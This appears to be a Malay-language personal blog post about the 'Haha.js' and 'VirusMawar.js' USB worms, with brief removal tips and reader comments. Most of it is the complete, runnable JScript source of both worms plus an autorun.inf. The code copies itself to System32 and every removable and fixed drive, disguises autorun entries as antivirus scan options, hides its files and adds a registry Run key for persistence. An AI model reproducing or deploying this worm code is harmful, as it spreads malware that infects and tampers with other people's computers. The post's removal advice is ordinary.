virusmawar.js
Klik Kat Sini utk mengetahui cara cara nak remove virus haha.js , mawarvirus tu.
rasanye dah lama kot virus tersebar, virus ni tak kacau ape ape cuma saje dia nak mengatal beranak pinak kat semua removal disk yang korang insert kat pc korang tu.
nie contoh isi perut virus Haha.js
Haha.js
// Haha v1.0.0.2
// Constant
var ThisFileName = “\\Haha.js“;
var AutorunFileName = “\\AutoRun.inf“;
var CRLF = “\r\n”;
var RemovableDrive = 1;
var FixedDrive = 2;
var DelayStart = 10000;
var DelayProcess = 1000;
var DelayFixedDrive = 60000;
// Global Variable
var ThisText,AutorunText,tf,RegPath;
AutorunText = “[autorun]” + CRLF;
AutorunText = AutorunText + “Open = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shellexecute = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Open\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Explore\\command = wscript.exe ” + ThisFileName + ” -Clicked” + CRLF;
AutorunText = AutorunText + “shell\\AutoPlay\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan for Viruses\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan with Norton AntiVirus\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan with AVG\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell = Explore”;
var fs = new ActiveXObject(“Scripting.FileSystemObject”);
var ThisPath = fs.GetFile(WScript.ScriptFullname);
var check = ThisPath.Drive.DriveType;
var WinPath = new String(fs.GetSpecialFolder(0)); // Windows Folder
var SysPath = new String(fs.GetSpecialFolder(1)); // System32 Folder
var aShell = new ActiveXObject(“WScript.Shell”);
// Open the explorer if double clicked
var aArgs = WScript.Arguments;
for (var i = 0; i < aArgs.length; i++)
{
if(aArgs(i) == “-Clicked”)
{
aShell.Run(WinPath + “\\explorer.exe ” + WScript.ScriptFullname.substr(0,3));
}
}
WScript.Sleep(DelayStart);
// copy diri sendiri save kat win dir
var text;
try
{
text = ThisPath.OpenAsTextStream(1,-2); //1 – open for read, -2 using syetem default encoding
ThisText = “”;
while (!text.AtendOfStream) // copy this file to the ThisText
{
ThisText = ThisText + text.ReadLine();
ThisText = ThisText + “\n”;
}
} catch(e){}
do
{
try
{
if (fs.FileExists(SysPath + ThisFileName))
{
tf = fs.GetFile(SysPath + ThisFileName);
tf.Attributes = 32; // Archive
}
tf = fs.CreateTextFile(SysPath + ThisFileName, 2, true); // overite n unicode
tf.Write(ThisText);
tf.Close();
tf = fs.GetFile(SysPath + ThisFileName);
tf.Attributes = 39; // Archive, ReadOnly, Hidden, System
} catch(e){}
var DrivesEnum = new Enumerator(fs.Drives);
var aDrive;
for (; !DrivesEnum.atEnd(); DrivesEnum.moveNext())
{
aDrive = DrivesEnum.item();
if ((aDrive.DriveType == RemovableDrive || aDrive.DriveType == FixedDrive) && aDrive.Path != “A:”) // 1 – Removable, 2 – Fixed
{
// copy diri sendiri save kat flash drive
try
{
if (fs.FileExists(aDrive.Path + ThisFileName))
{
tf = fs.GetFile(aDrive.Path + ThisFileName);
tf.Attributes = 32;
}
tf = fs.CreateTextFile(aDrive.Path + ThisFileName, 2, true);
tf.Write(ThisText);
tf.Close();
tf = fs.GetFile(aDrive.Path + ThisFileName);
tf.Attributes = 39;
} catch(e){}
// copy autorun.inf save kat flash drive
try
{
if (fs.FileExists(aDrive.Path + AutorunFileName))
{
tf = fs.GetFile(aDrive.Path + AutorunFileName);
tf.Attributes = 32;
}
tf = fs.CreateTextFile(aDrive.Path + AutorunFileName, 2, true);
tf.Write(AutorunText);
tf.Close();
tf = fs.GetFile(aDrive.Path + AutorunFileName);
tf.Attributes = 39;
} catch(e){}
}
}
// set registry
try
{
WScript.Sleep(DelayProcess);
//RegPath = “HKEY_LOCAL_MACHINE”;
//RegPath = RegPath + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Run“;
//RegPath = RegPath + “\\Haha“;
//aShell.RegWrite(RegPath, “wscript.exe ” + SysPath + ThisFileName, “REG_SZ”);
//RegPath = “HKEY_CURRENT_USER”;
//RegPath = RegPath + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced“;
//RegPath = RegPath + “\\ShowSuperHidden“;
//aShell.RegWrite(RegPath, 0, “REG_DWORD”);
RegPath = “HKEY_CURRENT_USER”;
RegPath = RegPath + “\\Software\\Microsoft\\Internet Explorer\\Main”;
RegPath = RegPath + “\\Window Title”;
aShell.RegWrite(RegPath, “Haha”, “REG_SZ”);
} catch(e){}
// wait 1 min for fixed drv
if (check != RemovableDrive)
WScript.Sleep(DelayFixedDrive);
} while(check != RemovableDrive && WScript.ScriptFullname.substr(0,3).toLowerCase() == SysPath.substr(0,3).toLowerCase())
// Run system Haha before this Haha closed
if (check == RemovableDrive)
aShell.Run(“wscript.exe ” + SysPath + ThisFileName);
———————————————————
nie lak isi perut sekutu dia
autorun.js
[autorun]
Open = wscript.exe \VirusMawar.js
shellexecute = wscript.exe \VirusMawar.js
shell\Open\command = wscript.exe \VirusMawar.js
shell\Explore\command = wscript.exe \VirusMawar.js -Clicked
shell\AutoPlay\command = wscript.exe \VirusMawar.js
shell\Scan for Viruses\command = wscript.exe \VirusMawar.js
shell\Scan with Norton AntiVirus\command = wscript.exe \VirusMawar.js
shell\Scan with AVG\command = wscript.exe \VirusMawar.js
shell = Explore
————————————
yang ni aku rasa baru je aku jumpa dalam pc aku nieh…VirusMawar.js. cara dia beroperasi sama dengan Haha.js
VirusMawar.js
// Haha1.0.0.2
// Constant
var ThisFileName = “\\VirusMawar.js“;
var Mwrdy=”\\Mwrdy.exe“
var AutorunFileName = “\\AutoRun.inf“;
var CRLF = “\r\n”;
var RemovableDrive = 1;
var FixedDrive = 2;
var DelayStart = 10000;
var DelayProcess = 1000;
var DelayFixedDrive = 60000;
// Global Variable
var ThisText,AutorunText,tf,RegPath;
AutorunText = “[autorun]” + CRLF;
AutorunText = AutorunText + “Open = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shellexecute = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Open\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Explore\\command = wscript.exe ” + ThisFileName + ” -Clicked” + CRLF;
AutorunText = AutorunText + “shell\\AutoPlay\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan for Viruses\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan with Norton AntiVirus\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan with AVG\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell = Explore”;
var fs = new ActiveXObject(“Scripting.FileSystemObject”);
var ThisPath = fs.GetFile(WScript.ScriptFullname);
var check = ThisPath.Drive.DriveType;
var WinPath = new String(fs.GetSpecialFolder(0)); // Windows Folder
var SysPath = new String(fs.GetSpecialFolder(1)); // System32 Folder
var aShell = new ActiveXObject(“WScript.Shell”);
// Open the explorer if double clicked
var aArgs = WScript.Arguments;
for (var i = 0; i < aArgs.length; i++)
{
if(aArgs(i) == “-Clicked”)
{
aShell.Run(WinPath + “\\explorer.exe ” + WScript.ScriptFullname.substr(0,3));
}
}
WScript.Sleep(DelayStart);
// copy diri sendiri save kat win dir
var text;
try
{
text = ThisPath.OpenAsTextStream(1,-2); //1 – open for read, -2 using syetem default encoding
ThisText = “”;
while (!text.AtendOfStream) // copy this file to the ThisText
{
ThisText = ThisText + text.ReadLine();
ThisText = ThisText + “\n”;
}
} catch(e){}
do
{
try
{
if (fs.FileExists(SysPath + ThisFileName))
{
tf = fs.GetFile(SysPath + ThisFileName);
tf.Attributes = 32;
tf2 = fs.GetFile(SysPath + Mwrdy);
tf2.Attributes = 32;// Archive
}
tf = fs.CreateTextFile(SysPath + ThisFileName, 2, true); // overite n unicode
tf.Write(ThisText);
tf.Close();
tf = fs.GetFile(SysPath + ThisFileName);
tf.Attributes = 39;
tf2 = fs.GetFile(SysPath + Mwrdy);
tf2.Attributes = 39;// Archive, ReadOnly, Hidden, System
} catch(e){}
var DrivesEnum = new Enumerator(fs.Drives);
var aDrive;
for (; !DrivesEnum.atEnd(); DrivesEnum.moveNext())
{
aDrive = DrivesEnum.item();
if ((aDrive.DriveType == RemovableDrive || aDrive.DriveType == FixedDrive) && aDrive.Path != “A:”) // 1 – Removable, 2 – Fixed
{
// copy diri sendiri save kat flash drive
try
{
if (fs.FileExists(aDrive.Path + ThisFileName))
{
tf = fs.GetFile(aDrive.Path + ThisFileName);
tf.Attributes = 32;
tf2 = fs.GetFile(aDrive.Path + Mwrdy);
tf2.Attributes = 32;
}
tf = fs.CreateTextFile(aDrive.Path + ThisFileName, 2, true);
tf.Write(ThisText);
tf.Close();
tf = fs.GetFile(aDrive.Path + ThisFileName);
tf.Attributes = 39;
tf2 = fs.GetFile(aDrive.Path + Mwrdy);
tf2.Attributes = 39;
} catch(e){}
// copy autorun.inf save kat flash drive
try
{
if (fs.FileExists(aDrive.Path + AutorunFileName))
{
tf = fs.GetFile(aDrive.Path + AutorunFileName);
tf.Attributes = 32;
}
tf = fs.CreateTextFile(aDrive.Path + AutorunFileName, 2, true);
tf.Write(AutorunText);
tf.Close();
tf = fs.GetFile(aDrive.Path + AutorunFileName);
tf.Attributes = 39;
} catch(e){}
}
}
// set registry
try
{
WScript.Sleep(DelayProcess);
RegPaths = “HKEY_LOCAL_MACHINE”;
RegPaths = RegPaths + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Run“;
RegPaths = RegPaths + “\\VirusMawar“;
aShell.RegWrite(RegPaths, “wscript.exe ” + SysPath + ThisFileName, “REG_SZ”);
RegPathss = “HKEY_CURRENT_USER”;
RegPathss = RegPathss + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced“;
RegPathss = RegPathss + “\\ShowSuperHidden“;
aShell.RegWrite(RegPathss, 0, “REG_DWORD”);
RegPath = “HKEY_CURRENT_USER”;
RegPath = RegPath + “\\Software\\Microsoft\\Internet Explorer\\Main”;
RegPath = RegPath + “\\Window Title”;
aShell.RegWrite(RegPath, “Virus Mawar SEDANG MENGGANAS WARHAHAHAHAHAHAHA++++=====”, “REG_SZ”);
} catch(e){}
// wait 1 min for fixed drv
if (check != RemovableDrive)
WScript.Sleep(DelayFixedDrive);
} while(check != RemovableDrive && WScript.ScriptFullname.substr(0,3).toLowerCase() == SysPath.substr(0,3).toLowerCase())
// Run system VirusMawar before this VirusMawar closed
if (check == RemovableDrive)
aShell.Run(“wscript.exe ” + SysPath + ThisFileName);
salah satu cara nak remove virus nie korang download software Scotty Winpatrol dan search files Haha.js / Autorun.inf / VirusMawar.js lepas tu right-click then pilih “Delete On Reboot” lepas tu korang search dalam internet files UnHookExec.inf then download pastu double-click files UnHookExec.inf. taraaaaa lepas tu dah cuci pon komputer korank. ada pe pe masalah leh email starbucks.cafe@gmail.com atau layan je frenster aku www.friendster.com/ariyako
4 Comments »
Leave a comment
The Owner >
Aku? hmmm seorang yang down to earth person…senang nak cakap aku adalah open minded person, banyak sense of humor, suka ketawa sampai muntah, suka lepak² dgn kawan² humor tahap cipan². suka mencari kawan dan hate to messin around with farking people. aku bukan penakut tapi tak dapat nak tolong diri aku untuk menjadi jahat. tErIma SeaDanya SiaPa disEKeLilIng aKu YaNg MeNerimA AKu seAdAnYa.
Please Visit
a friends blogs
Furkan
Hatta a.k.a beckam kelate
Fairuji a.k.a Faisal
Manga
toriyamaworld
mangaproject
manga-daisuki
omanga
pinoyotaku
abildsoe
certhy.mircx
mangasync
mangatranslation
manganews
ezmanga.com
animenewsnetwork
production-ig
animenewsnetwork
Online Users
Technorati
salam,
aku dah delete kt winpatrol, tp tak boleh run UnHookExec.inf. acess denied… kenapa ya???
bole x btkan anti virus yang xkena install kat pc sendiri..maksudnya anda sediakan perkhidmatan scan virus mawar ni secara percuma?
uit.. igt sonang ke nk wt ntvirus cik adik oi..
kekekek nak wat ntvirus tu senang tapi nak wat software nt virus tu susah..pening tak ngan ayat tu..muheheheh
…